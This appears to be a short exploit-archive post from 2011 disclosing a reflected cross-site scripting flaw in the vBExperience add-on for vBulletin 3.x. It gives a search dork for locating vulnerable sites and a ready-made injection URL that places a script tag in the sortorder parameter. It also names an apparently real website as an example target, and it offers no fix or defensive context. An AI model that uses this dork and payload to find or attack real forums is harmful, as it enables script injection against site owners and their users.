vBulletin 3.x vBExperience Cross Site Scripting



EKU-ID: 445 CVE: OSVDB-ID:
Author: Mr.ThieF Published: 2011-06-07 Verified: Not Verified
Download:

Rating

☆☆☆☆☆
Home


[~] Author : Mr.ThieF <~

[~] Contact : Mr.ThieF@yahoo.com <~

[~] DorK : inurl:xperience.php

[~] Software Link : http://www.vbulletin.org/forum/showthread.php?t=171014

[~] Version : 3.x.x

[~] Exploit :

http://[site]/[path]/xperience.php?sortfield=xr&sortorder="><s cript>alert(1);</s cript>

Example : http://www.worldwide-invest.org/xperience.php?sortfield=xr&sortorder="><s cript>alert(1);</s cript>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

GreeTz : RENO <3 - x-CoD3r <3 - T3rr0risT_07 <3 -Snip3r_www - ALL My FrindS <3